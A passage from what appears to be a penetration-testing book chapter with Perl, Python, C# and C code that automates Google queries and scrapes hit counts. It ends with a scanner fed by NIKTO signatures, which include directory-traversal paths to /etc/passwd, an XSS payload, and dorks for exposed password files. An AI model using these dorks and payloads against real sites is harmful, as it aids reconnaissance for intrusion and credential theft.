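        # Raw socket data arrives as bytes; latin-1 never fails to decode.
        page = page.decode("latin-1")
    match = _HITS.search(page)
    if match is None:
        return None                      # atypical page: no landmark present
    digits = re.sub(r"[^0-9]", "", match.group(1))
    return int(digits) if digits else None


# Hypothetical fragments resembling a results line and an atypical page.
print(parse_total_hits("Results <b>1</b> - <b>10</b> of about <b>53,400,000</b> for dog"))
print(parse_total_hits("Your search did not match any documents."))
```

A caller can then treat None as "no usable result" and move on, rather than slicing a fixed number of characters from a page that may not contain the expected text.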
Pseudocoding
The concept of pseudocoding software or a tool before you start developing is something that is regularly taught in college courses as well as embraced in the commercial software development world. One popular form of this practice is creating a Unified Modeling Language (UML) diagram. UML is most commonly utilized in developing object-oriented software, but it can also be used to create even the smallest of tools. More common than UML, and its predecessor, is the ever-present graphical flowchart depicting the overarching processes and components that together make up an application.

One of our goals is to discuss different implementations for automating Google queries and the differences, small or large, between the languages. Before we dive into the implementations, let's describe the overall process to achieve our Google Query Library goals in a software process flow diagram. See Figure 12.6.

Figure 12.6 Google Query Library Process
[Flowchart: Initialize Socket → Send Google Request → Retrieve Google Response → Scrape Google Response → Return Total Hits]

The Google attack libraries are divided into five overarching categories that will commonly be included within all the different language implementations:

■ Socket initialization This is the first category, reading the diagram from left to right. Each of the different language implementations will create and establish a socket that will then be utilized to send data to and receive data from Google.
■ Send a Google request or query Following the arrows, this is the second milestone. Notice that submilestones not mentioned include ascertaining the query and formatting potential arguments within that query.
■ Retrieve the Google response generated from your query This response will contain several sets (or carriage-returned lines) of information; most important, it will include the total number of hits your query generated.
Other bits of information that we are currently less interested in include Web sites and the full URLs for the responses.
■ Scrape or separate The fourth process will be to scrape or separate the useful desired information from the less useful and commonly overwhelming amount of information that Google returns on the main pages in response to search requests. In this case, we will search for an "of about" string that precedes the total hits count for the page. It will act as a landmark for us, helping pinpoint the location of the total hits number.
■ Return the total number of hits Last but certainly not least, we will return the total number of hits that the query generated to the calling location within the script or program. This allows us to create flexible code that can be further extended at a later time or included within a larger pen-testing script or program.

Perl Implementation
The following Perl implementation has very little debug code and was created to depict how easy it is to automate custom querying on Google and page scraping within ascertained Web pages. The material is divided into three main components. The first is a dump of the source, the second is the script's execution output, and the last is documentation for the script's logic and code implementation.

GOOGLE_PERL.PL SOURCE

    #!/usr/bin/perl -w
    #Section 1
    #Google Hacking in Perl
    #Written by Foster
    use IO::Socket;

    #Section 2
    $query  = '/search?hl=en&q=dog';
    $server = 'www.google.com';
    $port   = 80;

    #Section 3
    #############################
    sub socketInit() {
        $socket = IO::Socket::INET->new(
            Proto    => 'tcp',
            PeerAddr => $server,
            PeerPort => $port,
            Timeout  => 10,
        );
        unless ($socket) {
            die("Could not connect to $server:$port");
        }
        # send data as soon as it is written instead of buffering it
        $socket->autoflush(1);
    }

    #Section 4
    ############################
    sub sendQuery($) {
        my ($myquery) = @_;
        print $socket ("GET $myquery HTTP/1.0\n\n");
        # read the response line by line until the hit-count line appears
        while ($line = <$socket>) {
            if ($line =~ /Results.*of\sabout/) {
                return $line;
            }
        }
    }

    #Section 5
    ############################
    sub getTotalHits($) {
        my ($ourline) = @_;
        $hits  = "";
        $index = index($ourline, "of about");
        $str   = substr($ourline, $index, 30);
        @buf   = split(//, $str);
        # keep only the digits found in the 30-character slice
        foreach my $char (@buf) {
            if ($char =~ /[0-9]/) {
                $hits = $hits . $char;
            }
        }
        return $hits;
    }

    ############################
    #Section 6
    socketInit();
    $string    = sendQuery($query);
    $totalhits = getTotalHits($string);

    #Printing to STDOUT the Total Hits Retrieved from Google
    print($totalhits);

Output
When you execute the previous Perl script with the embedded Google Attack Libraries, you will receive the following standard out (STDOUT). The output represents the total number of Google pages that are returned with the submitted query:

    %GABE%\ perl google_perl.pl
    %GABE%\ 53400000

Source Documentation
The first section of this program, Section 1, contains the header information for the script. It contains the path to the Perl interpreter, along with the socket module initialization. Section 2 sets the three global variables that are required to test these Google Attack Libraries using a live example against Google.com. The first is the query that will be passed to the functions later down the line.
If you need to automate these functions as a part of a larger Google scanning application, the hardcoded query could be replaced with a looping mechanism that passes multiple queries to the Google Attack Library functions. The second and third variables store Google's server address or domain name and the corresponding port it resides on. We realize we could have hardcoded the port number to 80, but to make the code more flexible the variables are left as dynamic.

The first function in our Perl example is the socketInit function. The initial part creates the socket structure with the corresponding protocol, server address, port, and socket timeout value. The socket is a plain TCP socket, not an HTTP client; the HTTP request will be created manually and forced onto the wire. The unless statement checks whether the socket was established. If it was not, the program exits with the die statement and prints an error message to the screen. The last line turns on autoflush for the socket so that data is transmitted as soon as it is written.

The fourth section is the sendQuery function. This function requires one parameter, the query that you want to run on Google. The parameter is read on the first line and saved to the local $myquery variable. The second line in the function writes the HTTP request, which contains the desired query, to the socket. The while loop is utilized to read the Google page's response one line at a time. The encapsulated if statement is used to find the line that contains the total hit count by matching the "of about" string that is always found on the Google page. Once that line is identified, it is returned to the calling function.

Section 5 is the meat of the script, containing all the page-scraping code. It also takes in one parameter and stores it in the local scope variable $ourline.
The global $hits variable is initialized and will later be used to store the total number of Google hits before it is returned. The index() line finds the numerical location of the string "of about", which is located right before the total hits on the response page of a Google query. The next line then utilizes the substr() function to grab 30 characters, starting at the index location. (The total hits number will be included as a part of those 30 characters.) The looping construct underneath is then utilized to grab all digits from that string and store them in the $hits variable. Lastly, the $hits variable is returned to the calling function location.

Section 6 comprises four main components. The first component calls the socket initialization function. The second line is subdivided into two parts. The right side of the equal sign is utilized to call the sendQuery function with the desired query. In the case of a Google Pen Tester, this query could be a CGI scan, exploit search, or allinurl: vulnerability scan. Whatever the search, the response of that search is saved in the $string variable. That $string variable is then passed to the getTotalHits function. The total number of hits is stored in the new $totalhits variable, then printed to standard out (STDOUT) via the last line of the program.

Python Implementation
Python proved an extremely efficient language in terms of the number of lines of code needed to reach success. Not only was it easy to write due to the object-oriented nature of Python, but few actual lines of code were needed to obtain the results we were looking for. When you compare the Python code to the Perl code, you will undoubtedly notice a few key differences. For instance, in the Python code, we strip out digits using a regular expression instead of parsing through a looping construct. The other major difference is that we have encapsulated our socket establishment code within try/except blocks.
These blocks aid in exception handling and debugging if there is an error.

This was hands-down our favorite Google Query Library; two thumbs up for object-oriented scripting languages. Included in this example are our source, output, and source documentation.

Source

    #Google Hacking in Python
    #Written by Foster
    #Section 1
    import socket
    import sys
    import re   #Regular Expression Module

    #Section 2
    HOST = 'www.google.com'   # The remote host
    PORT = 80                 # The same port as used by the server
    s = None
    query = "/search?hl=en&q=dog"

    #Section 3
    for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
        af, socktype, proto, canonname, sa = res
        try:
            s = socket.socket(af, socktype, proto)
        except socket.error as msg:
            s = None
            continue
        try:
            s.connect(sa)
        except socket.error as msg:
            s.close()
            s = None
            continue
        break
    if s is None:
        print('could not open socket')
        sys.exit(1)

    #Section 4
    s.send(("GET " + query + " HTTP/1.0\n\n").encode('ascii'))
    myindex = 0
    while myindex < 1:
        data = s.recv(8096)
        if not data:
            # the server closed the connection before "about" was seen
            break
        myindex = data.find(b"about")
    s.close()

    #Section 5
    mysubstr = data[myindex : myindex + 30]
    regexObj = re.compile(br'\d')
    digits = regexObj.findall(mysubstr)
    totalHits = b''.join(digits)
    print(totalHits.decode('ascii'))

Output
The following output represents the corresponding total hits retrieved from Google:

    53500000

Source Documentation
The first section of the Python script, Section 1, defines the modules that are required to run the script. It uses import to allow the script access to particular objects and methods. Section 2 contains the four global variables that we have become accustomed to declaring in the beginning of our examples. They include our socket object, host, port, and query variables.

The third section contains all our socket initialization code. Its first line asks getaddrinfo() for the candidate address records from which the socket structure is created.
The two try/except blocks encapsulate the socket creation and connection code. If an except block is executed, the failed attempt is discarded and the loop moves on to the next address. If a socket could not be created at all, the debug message "could not open socket" is sent to STDOUT and the script exits.

Section 4 is utilized to both send the Google query and store the appropriate Google response. The first line of code writes the HTTP request to the socket. The myindex variable is initially set to zero because it is used as our marker for when we have received the part of the Google response that holds our total hits number. Since Google's response arrives in a series of chunks, we must loop through each one individually until the desired text is in the memory buffer. The while loop is utilized to loop through the response, and once the "about" string is identified, it sets myindex to a number greater than zero, thereby causing the loop to end. Lastly, the socket is closed.

The last section of this script is Section 5. The first line of code utilizes the index ascertained in Section 4 to grab a 30-character slice of the complete Google response. The total hits number is encapsulated within this 30-character string. The second line compiles a regular expression to identify all digits within a particular string. The findall method is then utilized to create a list of the digits within the slice. The list is then converted back to a string using the join method before being printed to STDOUT on the last line of the script.

Extending this script to scrape sites that are included in Google's responses or the specific URL hits contained in the response is not terribly difficult; however, it does add another layer of complexity. We would only need to create a looping structure, then implement a regular expression engine to search out URL-like strings within the response page.
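The extension just described can be sketched as follows. This is a minimal, hedged illustration for Python 3 rather than part of the chapter's library: the function name extract_result_hosts, the href pattern, and the sample HTML are all hypothetical, and a real results page may mark up its links differently. It works on a page that has already been retrieved and decoded to text.

```python
import re
from urllib.parse import urlsplit

# Assumed markup: result links appear as href="http(s)://..." attributes.
_HREF = re.compile(r'href="(https?://[^"]+)"')


def extract_result_hosts(page, skip_suffix="google.com"):
    """Return unique host names linked from the page, in order of appearance.

    Links that point back at the search engine itself are skipped.
    """
    hosts = []
    seen = set()
    for url in _HREF.findall(page):          # the looping structure
        host = (urlsplit(url).hostname or "").lower()
        if not host:
            continue
        if host == skip_suffix or host.endswith("." + skip_suffix):
            continue
        if host not in seen:
            seen.add(host)
            hosts.append(host)
    return hosts


# Hypothetical response fragment used only to exercise the function.
sample = ('<a href="http://www.example.com/exploits/a.html">a</a> '
          '<a href="http://www.google.com/intl/en/about.html">About</a> '
          '<a href="http://lists.example.org/archive/b.html">b</a> '
          '<a href="http://www.example.com/exploits/c.html">c</a>')
print(extract_result_hosts(sample))
```

Keeping the hosts in a list plus a set preserves the order in which Google returned them while still dropping duplicates.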
Once they're retrieved, the option exists to print them to standard out or push them to an associative array. Chapter 10 has more information on utilizing regular expressions within Google searches.

C# Implementation (.NET)

C#, pronounced C sharp, is a much different beast when it comes to implementing Google attack libraries within applications or automated penetration testing tools. First, the entire language was created in an object-oriented manner for object-oriented programming (OOP) developers. As you will see in our code demonstration, the attack function utilized in the Perl example no longer exists. Instead we have created a .NET C# object that contains the functionality for auto-querying Google, scraping the page results, then returning the number of total hits for any specified query. Since this example has the same output as the Perl example, we have omitted that section and only provided the source along with its documentation.

GOOGLE_CSHARPE.CS SOURCE

    //Google Hacking in C#
    //Written by the master BW
    using System;
    using System.Text;
    using System.Text.RegularExpressions;
    using System.Net;
    using System.Net.Sockets;

    namespace ConsoleApplication2
    {
        class GoogleQuery
        {
            //Required Socket Variables
            private const string query = "/search?hl=en&q=dog";
            private const string server = "www.google.com";
            private const int port = 80;
            private Socket socket;

            //Method #1
            public void SocketInit()
            {
                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                IPHostEntry ipHostInfo = Dns.Resolve(server);
                IPAddress ipAddress = ipHostInfo.AddressList[0];
                socket.Connect(new IPEndPoint(ipAddress, port));
            }

            //Method #2
            public void SendQuery()
            {
                socket.Send(ASCIIEncoding.ASCII.GetBytes(string.Format("GET {0} HTTP/1.0\n\n", query)));
            }

            //Method #3
            public string GetTotalHits()
            {
                // receive the total page
                byte[] buffer = null;
                byte[] chunk = new byte[4096];
                try
                {
                    while (socket.Receive(chunk) > 0)
                    {
                        byte[] tmp = new byte[(buffer == null ? 0 : buffer.Length) + chunk.Length];
                        if (buffer != null)
                            buffer.CopyTo(tmp, 0);
                        chunk.CopyTo(tmp, buffer != null ? buffer.Length : 0);
                        buffer = tmp;
                    }
                }
                catch
                {
                    if (buffer == null)
                        throw new Exception("No data read from host");
                }

                // find the total hits
                string text = System.Text.ASCIIEncoding.ASCII.GetString(buffer);
                Regex regex = new Regex(@"of about <b>(?<count>[0-9,]+)");
                Match m = regex.Match(text);
                if (m.Success == false)
                    throw new Exception("Parse error");
                return m.Groups["count"].Value;
            }
        }

        /// <summary>
        /// Summary description for Class1.
        /// </summary>
        class AppClass
        {
            /// <summary>
            /// The main entry point for the application.
            /// </summary>
            [STAThread]
            static void Main(string[] args)
            {
                GoogleQuery gq = new GoogleQuery();
                gq.SocketInit();
                gq.SendQuery();
                Console.WriteLine("Total Hits {0}", gq.GetTotalHits());
            }
        }
    }

Source Documentation

The code for the Google C# application is much different from that of the Perl script because it's object oriented and located in a single object as opposed to functions. Initially, we'll create a new object that will be responsible for the core of our functionality. This new object will allow us to easily reuse our code in other projects or in applications that attempt to wrap or further automate the Google querying process. The name of the object that we have created is GoogleQuery. GoogleQuery has three public methods that we're interested in: SocketInit, SendQuery, and GetTotalHits. It also declares three private constants: string query, string server, and int port. These store the program's required variables for instantiating and establishing the socket connection.

The first public method, SocketInit, creates a new TCP socket via the Socket object's constructor. Following the creation of the TCP socket, it looks up the IP address of google.com by means of the static, built-in .NET method Dns.Resolve. Dns.Resolve returns an object of type IPHostEntry. The IP address of google.com can be extracted from this object by referencing the first index of the AddressList member of IPHostEntry (ipHostInfo.AddressList[0]). Next, the code creates an object of type IPEndPoint and passes two arguments to its constructor: the IP address gleaned from IPHostEntry and the port number to connect to. This IPEndPoint object is then passed as an argument to the socket object's Connect method. Should all this succeed, the socket is connected to google.com's port 80. If it fails, an exception will be thrown; however, due to the demonstrative nature of this example, error handling has been omitted from the program.

GoogleQuery's SendQuery method is rather simple. It merely passes an HTTP GET request string to the established Google socket. One thing to note is that Socket.Send expects a byte array rather than an ASCII string. For that reason, we need to convert the ASCII string to a byte array using the ASCIIEncoding.ASCII.GetBytes static method.

The last method of interest, or Method 3, is GetTotalHits. The first 19 lines of code wait until all data is received from the socket and concatenate it into one buffer. This code uses the method Socket.Receive, which fills a byte array. The last segment of interesting code is the utilization of .NET regular expressions. First, we instantiate a Regex object and pass it one parameter: the pattern to search for. The pattern string consists of the literal phrase "of about <b>" followed by a named group, count, whose pattern matches a run of digits and commas.
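The same named-group idea can be sketched in Python, whose re module spells the group (?P<count>...) rather than (?<count>...). The function name parse_total_hits and the sample text are assumptions for illustration only.

```python
import re

# Literal phrase "of about <b>" followed by a named group of digits and commas.
HITS_PATTERN = re.compile(r"of about <b>(?P<count>[0-9,]+)")

def parse_total_hits(text):
    """Return the matched count as a string, or raise ValueError on a parse error."""
    match = HITS_PATTERN.search(text)
    if match is None:
        raise ValueError("Parse error")
    # The group is looked up by name instead of by position.
    return match.group("count")

# Hypothetical response fragment, for illustration only.
sample = "Results 1 - 10 of about <b>53,500,000</b> for <b>dog</b>."
print(parse_total_hits(sample))
```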
By naming the components of a regular expression, it becomes easier to reference them after the pattern has been matched (m.Groups["count"].Value). Next, the Regex object is passed the buffer returned from Google via the Match method. After that, if the pattern matches, a string is returned that contains the number of hits found from the query.

Underground Googling...
Where Credit Is Due

A special thank you goes out to Blake Watts (www.blakewatts.com) for his assistance with the C# code and knowledge. You continue to rock. Thanks, dude!

C Implementation

The following C implementation was provided by our friend l0om to be utilized as an educational tool in this book. As you will quickly come to see, the C implementation is somewhat different from the other language implementations described in this chapter. Not only is this implementation longer, it includes additional functionality that the other language kits have left out. Additional functionality includes command-line help documentation and the ability to receive command-line arguments and return a list of sites included within the response. Only the complete source and corresponding documentation have been incorporated into this section.

SOURCE

    //Google Hacking in Good Old-Fashioned C
    //Written by l0om
    //Revised and Documented by Foster
    /*
       lgool V 0.2
       written by l0om
       WWW.EXCLUDED.ORG - l0om[47]excluded[d07]org
       idea based on johnny longs gooscan and goole dorking itself. thanks john.
       this is a part of a proof-of-concept project in automate attacks with
       googles help.
       greets to goolemasters: murfie, klouw, ThePsyko, jimmyneutron, MILKMAN,
       Deadlink, crash_monkey, zoro25 cybercide, wasabi
       greets to geeks/freaks/nice_people like: proxy, detach, takt, dna,
       maximilan, capt.boris, dr.dohmen, mattball
    */

    //Section 1
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>       // read(), close()
    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/socket.h>   // socket(), connect(), send()
    #include <netinet/in.h>
    #include <netdb.h>

    //Section 2
    #define GOOGLE "www.google.com"                 //default google server to send query
    #define PATTERN "<p class=g><a href="           //identifies links in googles results
    #define RESULTS "<font size=-1 color=#000000>"  //show results

    char *encode(char *str);               // NULL on failure / the encoded query on success
    int connect_me(char *dest, int port);  // -1 on failure / connected socket on success
    int grep_google(char *host, int port, int proxy, char *query, int mode, int start);
    void help(char *usage);
    void header(void);

    //Section 3
    int main(int argc, char **argv)
    {
        int i, port = 0, valswap, max = 0, only_results = 0, site = 0, proxl = 0;
        // greets at proxy - this variable is dedicated to you ;D h4h4h4
        char *host = NULL, *query = NULL;

        if(argc == 1) {
            help(argv[0]);
            return(1);
        }
        else for(i = 1; i < argc; i++)
            if(argv[i][0] == '-')
                switch(argv[i][1]) {
                    case 'V':
                        header();
                        return(0);
                    case 'r':
                        only_results = 1;
                        break;
                    case 'm':
                        max = atoi(argv[++i]);
                        break;
                    case 'p':
                        if( (host = strchr(argv[++i], ':')) == NULL) {
                            fprintf(stderr, "illegal proxy syntax [host:port]\n");
                            return(1);
                        }
                        port = atoi(strtok(host, ":"));
                        host = strtok(argv[i], ":");
                        proxl = 1; // "gib frei ich will rein"
                        break;
                    case 'h':
                        help(argv[0]);
                        return(0);
                }
            else query = argv[i];

        if(query == NULL) {
            fprintf(stderr, "no query!\n");
            help(argv[0]);
            return(1);
        }
        if( (query = encode(query)) == NULL) {
            fprintf(stderr, "string encoding faild!\n");
            return(2);
        }
        if(!max) {
            if(grep_google(host, port, proxl, query, only_results, site) > 0) return(0);
            else return(1);
        }
        for(i = 0; i < max;)
            if( (valswap = grep_google(host, port, proxl, query, only_results, site)) <= 0)
                return(1);
            else if(valswap < 10) return(0);
            else { i += valswap; site += 10; }
        return(0);
    }

    //Section 4
    int grep_google(char *host, int port, int proxl, char *query, int mode, int site)
    {
        unsigned int results = 0;
        int sockfd, nbytes, stdlen = 31, prxlen = 38+strlen(GOOGLE), buflen = 100;
        char *sendthis, *readbuf, *buffer, *ptr;

        if(proxl) {
            if( (sockfd = connect_me(host, port)) == -1) // connect to proxy
                return(-2);
            if( (sendthis = (char *)malloc(prxlen+strlen(query)+7)) == NULL) {
                perror("malloc");
                return(-1);
            } else sprintf(sendthis, "GET http://%s/search?q=%s&start=%d HTTP/1.0\n\n", GOOGLE, query, site);
        } else {
            if( (sockfd = connect_me(GOOGLE, 80)) == -1)
                return(-2);
            if( (sendthis = (char *)malloc(stdlen+strlen(query)+7)) == NULL) {
                perror("malloc");
                return(-1);
            } else sprintf(sendthis, "GET /search?q=%s&start=%d HTTP/1.0\n\n", query, site);
        }

        // one spare, zeroed byte keeps readbuf terminated for strcat()
        if( (readbuf = (char *)calloc(1, 256)) == NULL) {
            perror("malloc");
            return(-1);
        }
        if( (buffer = (char *)malloc(1)) == NULL) {
            perror("malloc");
            return(-1);
        }
        buffer[0] = '\0'; // start with an empty string so strcat() is well defined

        if(send(sockfd, sendthis, strlen(sendthis), 0) <= 0)
            return(-2);

        while( (nbytes = read(sockfd, readbuf, 255)) > 0) {
            if( (buffer = (char *)realloc(buffer, buflen+=nbytes)) == NULL) {
                perror("realloc");
                return(-1);
            } else {
                strcat(buffer, readbuf);
                memset(readbuf, 0x00, 255);
            }
        }
        close(sockfd);

        ptr = buffer;
        while(buflen--)
            if(mode) {
                if(memcmp(ptr++, RESULTS, strlen(RESULTS)) == 0) {
                    ptr += strlen(RESULTS)-1;
                    while(memcmp(ptr, "for", 3) != 0) {
                        if(memcmp(ptr, "<b>", 3) == 0) ptr += 3;
                        else if(memcmp(ptr, "</b>", 4) == 0) ptr += 4;
                        else printf("%c", *ptr++);
                    }
                }
                else continue;
                printf("\n");
                return(0);
            }
            else {
                if(memcmp(ptr++, PATTERN, strlen(PATTERN)) == 0) {
                    ptr += strlen(PATTERN)-1;
                    results++;
                    while(memcmp(ptr, ">", 1) && buflen--) printf("%c", *ptr++);
                    printf("\n");
                }
            }

        free(sendthis);
        free(readbuf);
        return(results);
    }

    //Section 5
    char *encode(char *str)
    {
        static char *query;
        char *ptr;
        int nlen, i;

        nlen = strlen(str)*3;
        // +1 leaves room for the terminating '\0' written below
        if( (query = (char *)malloc(nlen+1)) == NULL) {
            perror("malloc");
            return(NULL);
        } else ptr = str;

        for(i = 0; i < nlen; i+=3)
            sprintf(&query[i], "%c%X", '%', *ptr++);
        query[nlen] = '\0';
        return(query);
    }

    //Section 6
    int connect_me(char *dest, int port)
    {
        int sockfd;
        struct sockaddr_in servaddr;
        struct hostent *he;

        if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            perror("socket");
            return(-1);
        }
        if( (he = gethostbyname(dest)) == NULL) {
            fprintf(stderr, "cannot resovle hostname\n");
            return(-1);
        }
        servaddr.sin_addr = *((struct in_addr *) he->h_addr);
        servaddr.sin_port = htons(port);
        servaddr.sin_family = AF_INET;
        if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(struct sockaddr)) == -1) {
            perror("connect");
            return(-1);
        } else return(sockfd);
    }

    //Section 7
    void help(char *usage)
    {
        printf("%s help\n", usage);
        printf("%s <query> [options]\n", usage);
        puts("options:");
        puts("-h: this help menu");
        puts("-p: request google with a proxy. next argument must be the proxy");
        puts("    and the port in the following format \"host:port\"");
        puts("-m: next argument must be the count of results you want to see");
        puts("-V: prints versions info");
        puts("-r: prints only the results count and exit");
        puts("examples:");
        printf("%s \"filetype:pwd inurl:service.pwd\" -r # show results\n", usage);
        printf("%s \"filetype:pwd inurl:service.pwd\" -m 30 # print about 30 results\n", usage);
    }

    //Section 8
    void header(void)
    {
        puts("\tlgool V 0.2");
        puts("written by l0om - WWW.EXCLUDED.ORG - l0om[47]excluded[d07]org\n");
    }

Source Documentation

The first section of this program (yes, it's a program, not a script) sets the required libraries that must be included to complete successful compilation. The second section includes the global definitions needed in the program and the function prototypes. Section 3 is the main() function of the program, whereas the fourth section is dedicated to "grepping the Google site." Section 4 contains the meat of the program because the searching and proxying logic is included within that function.

Section 5 is somewhat different from our scripting querying libraries and even the C# implementation. It's utilized to convert the desired search string in the program to an HTTP-compliant Google query string. Notice the conversion housed within the for loop. Once the string is properly formatted, the string is returned.
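The conversion performed in Section 5 can be sketched in Python as follows. Like the C function, it writes every character of the query as a percent sign followed by its hexadecimal value; the function name encode_all is an assumption for this example. The standard library's urllib.parse.quote is shown alongside as the more conventional choice, since it leaves letters, digits, and a few punctuation characters untouched.

```python
from urllib.parse import quote

def encode_all(query):
    """Percent-encode every byte of the query, in the spirit of the C encode() function.

    Each byte is zero-padded to two hex digits here, which the C "%X" format does not do.
    """
    return "".join("%{:02X}".format(byte) for byte in query.encode("utf-8"))

print(encode_all("dog"))
# safe="" asks quote() to escape reserved characters such as ":" as well.
print(quote("filetype:pwd inurl:service.pwd", safe=""))
```

Encoding every character is simple and always yields a valid query string, at the cost of tripling its length; quote() produces shorter, more readable URLs.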
The sixth section is one of our favorites because it's similar to the socket initialization functions within the other Google attack libraries. All the code to establish and connect to Google is contained in connect_me(). The socket structure and connection attempts are encapsulated in IF statements. In languages that support them, try/catch blocks are an alternative to IF statements. The seventh section of the program prints the Help menu. Last but not least, Section 8 is a header that prints the program's version information when the -V option is given.

Scanning the Web with Google Attack Libraries

We've covered the concept of automating Google query transmissions and retrieving data, but we have yet to prove that our libraries work in a real-world environment. The libraries were all created with dynamic usage in mind, thereby permitting our querying bots to reuse the Google query and scraping code with minimal inline modifications. The following tool leverages the attack signatures found in the NIKTO security database, which can be found at www.cirt.net.

CGI Vulnerability Scanning

The following is a CGI scanner that we have created by quickly extending the Perl implementation code. Before we display and document our source, a snippet of the NIKTO database has been included. The NIKTO database is a flat text file in which the fields are separated by commas (,). In this scenario, we are only concerned with the HTTP string that is meant to be sent to the target Web servers. It is critical to note that the NIKTO text-based database is completely broken from a consistency perspective. That said, every "attack" is listed in the second column of the file, and by no coincidence that is the field that we are ripping with our Google CGI Vulnerability Scanning tool.

NIKTO Vulnerability Database Snippet

    #VERSION,1.189
    #LASTMOD,09.06.2004
    # http://www.cirt.net
    ########################################################################
    # Checks: ws type,root,method,file,result,information,data to send
    ########################################################################
    # <script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET"
    # is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
    ## These are normal tests
    "generic","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc","passwd","GET","EW FileManager for PostNuke allows arbitrary file retrieval. OSVDB-8193."
    "generic","/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd","root:","GET","EW FileManager for PostNuke allows arbitrary file retrieval. OSVDB-8193."
    "generic","/logs/str_err.log","200","GET","Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries)."
    "abyss","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[fonts]","GET","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
    "abyss","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","[windows]","GET","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version."
    "abyss","[255 consecutive / characters]","index of","GET","Abyss 1.03 reveals directory listing when 255 /'s are requested."
    "abyss","/conspass.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
    "abyss","/consport.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
    "abyss","/general.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
    "abyss","/srvstatus.chl+","200","GET","Abyss allows hidden/protected files to be served if a + is added to the request."
    "alchemyeye","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
    "alchemyeye","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
    "alchemyeye","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","IP Configuration","GET","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands."
    "apache","/.DS_Store","Bud1","GET","Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version."
    "apache","/.FBCIndex","Bud2","GET","This file on OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html"
    "apache","//","index of","GET","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page."
    "apache","//","not found for:","OPTIONS","By sending an OPTIONS request for /, the physical path to PHP can be revealed."

The following is our developed source code to scan a particular site using the signatures housed within CIRT's NIKTO database.

SOURCE

    #!/usr/bin/perl -w
    use IO::Socket;

    $server = 'www.google.com';
    $port = 80;

    #############################
    sub socketInit()
    {
        $socket = IO::Socket::INET->new(
            Proto => 'tcp',
            PeerAddr => $server,
            PeerPort => $port,
            Timeout => 10,
        );
        unless($socket)
        {
            die("Could not connect to $server:$port");
        }
        $socket->autoflush(1);
    }

    ############################
    sub sendQuery($)
    {
        my ($myquery) = @_;
        print $socket ("GET $myquery HTTP/1.0\n\n");
        while ($line = <$socket>)
        {
            if ($line =~ /Results.*of\sabout/)
            {
                return $line;
            }
        }
    }

    ############################
    sub getTotalHits($)
    {
        my ($ourline) = @_;
        $hits="";
        $index = index($ourline, "of about");
        if ($index > -1)
        {
            $str = substr($ourline, $index, 30);
            @buf=split(//,$str);
            for ($i = 0; $i < 30; $i++)
            {
                if ($buf[$i] =~ /[0-9]/)
                {
                    $hits=$hits.$buf[$i];
                }
            }
            return $hits;
        }
        else
        {
            return $index;
        }
    }

    ############################
    ####
    #Code added to make this a CGI scanner
    $targetsite = "/search?sourceid=navclient&ie=UTF-8&q=site:syngress.com+";
    $cgifile = "nikto.txt";
    $allinurl = "allinurl:";

    open(CGI, $cgifile) || warn "could not open the CGI query file";
    while (<CGI>)
    {
        chop;
        #stripping comments
        next if (/^$/);       #ignore null lines
        next if (/^\s*#/);    #ignore comment lines
        next if (/^\%/);      #ignore documentation lines

        #spliting up the NIKTO database and storing elements
        ($type, $attack, $file, $method, $name) = split(/","/);
        $attack =~ s/^\s+//;  #remove leading whitespaces
        $attack =~ s/\s+$//;  #remove trailing whitespaces
        $attack = $targetsite . $allinurl . $attack;

        #In case you would like to see all the queries you are sending to Google
        #print "Trying Google Query: ", $attack, "\n";

        #Reconnect for every query: an HTTP/1.0 server closes the
        #connection after each response
        socketInit();
        $string = sendQuery($attack);
        $totalhits = getTotalHits($string);

        #Printing to STDOUT if the Total Hits Retrieved from Google is Greater than 0
        if ($index > 0)
        {
            print "VULNERABILITY FOUND WITH ", $totalhits, " TOTAL HITS\n";
        }
    }
    close CGI;

Output

First you will notice warnings when you run this script. These appear because we are splitting the NIKTO database into separate variables and utilizing only the second variable, $attack. There is no need to be concerned; these warnings are expected. The script will run all the NIKTO vulnerability checks within a set of Google queries and produce output when a vulnerability is found in Google's cache. No output will be displayed outside the warnings if vulnerabilities are not found.

Summary

In any implementation, automating information-gathering techniques has become a necessary evil. It's not feasible that we would ever have the time required to manually collect, store, parse, and analyze data from sources as large as Google. Throughout this chapter, we have provided an overview of the Google Development API with its benefits and downfalls.
We have also given you the code and knowledge to be able to directly access the Google Web application database with our Google attack libraries that contain query transmission and page-scraping functions. These libraries can be quickly extended to create additional tools, applications, or even Web-based CGI forms. Although beneficial, it is important to note that these libraries do not adhere to the Google terms of service and were meant to be for educational purposes only.

Solutions Fast Track

Understanding Google Search Criteria

